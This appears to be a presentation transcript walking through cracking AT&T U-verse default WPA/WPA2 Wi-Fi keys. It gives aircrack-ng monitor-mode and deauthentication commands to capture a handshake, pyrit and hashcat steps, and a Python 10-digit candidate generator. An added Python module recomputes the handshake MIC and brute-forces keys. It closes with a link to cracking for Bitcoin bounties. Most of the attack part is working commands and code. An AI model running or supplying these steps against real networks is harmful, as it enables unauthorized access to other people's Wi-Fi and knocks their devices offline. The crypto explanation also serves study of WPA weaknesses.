
Cracking AT&T U-verse Default WPA1/2 Passwords.


Presentation Transcript


  1. Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler. Awesome blog: http://blog.init6.me

  2. Getting the Handshake

  3. Aircrack's site has a pretty good tutorial. Boot from BackTrack 5 R3. First you want to see what kind of wifi connections you have to choose from. Start your wireless interface in monitor mode and list the WPA networks in range:
     # airmon-zc start wlan0
     # airodump-ng --encrypt wpa mon0

  4. Stop the monitor interface and restart it locked to the channel of the target:
     # airmon-zc stop mon0
     # airmon-zc start wlan0 <Channel Number>
     Then start airodump on the same channel along with some other options (write a pcap so the later tools can read it):
     # airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>

  5. Deauthenticate a client so that it reconnects and you capture the 4-way handshake:
     # aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
     Where:
     • -0 means deauthentication
     • 5 is the number of deauths to send
     • -a 00:14:6C:7E:40:80 is the MAC address of the access point
     • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
     • mon0 is the interface name

  6. WPA Handshake

  7. Verify 4-way Handshake

  8. PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256), i.e. PBKDF2-HMAC-SHA1 with 4096 iterations and a 256-bit output, salted with the SSID (so a precomputed PMK table is only good for one SSID). The PTK is a keyed-HMAC function (PRF-512 built on HMAC-SHA1) of the PMK over the two MAC addresses (AP and client) and the two nonces from the first two packets of the 4-Way Handshake. The first 128 bits of the PTK, the KCK, key the MIC on message 2, so a candidate passphrase is verified by recomputing that MIC and comparing it with the captured one. That recomputation is the per-candidate work aircrack-ng, pyrit and hashcat do; the pcap only needs to contain the two MACs, both nonces and one MIC'd EAPOL frame.

  9. Verify 4-way Handshake The easy way...... #pyrit -r <FILENAME>.pcap analyze

  10. Strip out the junk. #pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip

  11. CAP-2-HCCAP To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ (Current hashcat releases no longer read .hccap; the site now hosts cap2hashcat, which converts a capture to the 22000 hash format instead.)

  12. CRACK!!

  13. Python Script (candidate generator for the 10-digit U-verse default key; the original was Python 2, this version runs under Python 3):
     import sys

     MAX_INT = 9999999999                          # 10-digit keys: 0000000000 .. 9999999999
     BAD_PATTERNS = {x * 3 for x in '0123456789'}  # skip any run of three identical digits

     for number in range(MAX_INT):
         int_string = str(number).rjust(10, '0')   # zero-pad to 10 digits
         if any(pattern in int_string for pattern in BAD_PATTERNS):
             continue
         sys.stdout.write(int_string + '\n')       # one candidate per line, piped into hashcat (-a 0)

  14. Hashcat-plus. Dictionary mode fed from the script:
     $ python 2wire.py | ./oclHashcat-plus64.bin -m 2500 -a 0 <filename>.hccap --gpu-accel=160 --gpu-loops=1024
     88,770 c/s real
     or brute-force mask mode, ten digits:
     $ ./oclHashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1 ?d ?1?1?1?1?1?1?1?1?1?1
     114K c/s real
     The mask run is faster per candidate because the GPU generates the candidates itself instead of reading them from a pipe, but it searches the full 10^10 keyspace, including the triple-digit patterns the script skips.
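The check that slide 8 describes and that slides 13 and 14 run at scale, written out as an added Python example. This is not code from the presentation or from aircrack-ng, pyrit or hashcat: it derives PMK, PTK and KCK from a candidate passphrase and recomputes the MIC on EAPOL message 2, then walks the 10-digit U-verse candidate space from slide 13 against a handshake. The SSID "2WIRE123", both MAC addresses, the nonces and the EAPOL frame are constructed stand-ins for the pcap; the only real vector is the IEEE 802.11i test PMK for passphrase "password" / SSID "IEEE".

```python
import hashlib
import hmac
import struct

# ---- key hierarchy (IEEE 802.11i) -----------------------------------------

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", Min(AA,SPA)||Max(AA,SPA)||Min(ANonce,SNonce)||Max(ANonce,SNonce))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)

# EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81

def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: version 1 = HMAC-MD5 (WPA), 2 = HMAC-SHA1-128 (WPA2)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def check_candidate(capture: dict, passphrase: str) -> bool:
    """The per-candidate work of a WPA cracker: PMK -> PTK -> KCK -> recompute MIC and compare."""
    pmk = pmk_from_passphrase(passphrase, capture["ssid"])
    ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["client_mac"], capture["anonce"], capture["snonce"])
    kck = ptk[:16]  # first 128 bits of the PTK key the MIC
    return hmac.compare_digest(eapol_mic(kck, capture["eapol"], capture["version"]), capture["mic"])

# ---- U-verse candidate space from slide 13: 10 digits, no run of three identical digits ----

def uverse_candidates(start: int = 0, stop: int = 10_000_000_000):
    bad = {d * 3 for d in "0123456789"}
    for n in range(start, stop):
        s = f"{n:010d}"
        if not any(p in s for p in bad):
            yield s

def crack(capture: dict, candidates):
    """Return the first candidate whose recomputed MIC matches the captured one, else None."""
    for cand in candidates:
        if check_candidate(capture, cand):
            return cand
    return None

# ---- constructed handshake, standing in for the pcap (all values made up) ----

def build_eapol_msg2(snonce: bytes, version: int) -> bytes:
    """EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    key_info = 0x0100 | 0x0008 | version          # MIC bit | pairwise | key descriptor version
    body = (bytes([2]) + struct.pack(">HH", key_info, 16)   # RSN descriptor, key info, key length
            + struct.pack(">Q", 1)                          # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # SNonce, IV, RSC, ID
            + b"\x00" * 16 + struct.pack(">H", 0))          # MIC (zeroed), key data length
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body  # EAPOL v1, type 3 (Key)

def make_capture(passphrase: str, version: int = 2) -> dict:
    """Build the fields a cracker pulls out of a capture, with the MIC a real client would have sent."""
    cap = {
        "ssid": "2WIRE123",
        "ap_mac": bytes.fromhex("001122334455"),
        "client_mac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
        "version": version,
    }
    cap["eapol"] = build_eapol_msg2(cap["snonce"], version)
    pmk = pmk_from_passphrase(passphrase, cap["ssid"])
    ptk = ptk_from_pmk(pmk, cap["ap_mac"], cap["client_mac"], cap["anonce"], cap["snonce"])
    cap["mic"] = eapol_mic(ptk[:16], cap["eapol"], version)
    return cap

if __name__ == "__main__":
    cap = make_capture("1234567890")
    print(crack(cap, uverse_candidates(1234567800, 1234567900)))
```

Running the module tries the 10-digit candidates around the constructed key and prints "1234567890"; the same `check_candidate` is what a pipe from the slide 13 script or a hashcat mask run performs, just on the GPU and against a real pcap. Note that `uverse_candidates` is a narrowing of the ?d mask: the triple-digit filter is an assumption about the 2Wire default-key pattern taken from the slide 13 script, not something the key hierarchy requires.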

  15. Crack for Bitcoin. http://www.hashbounty.net/bounties

  16. sources http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/
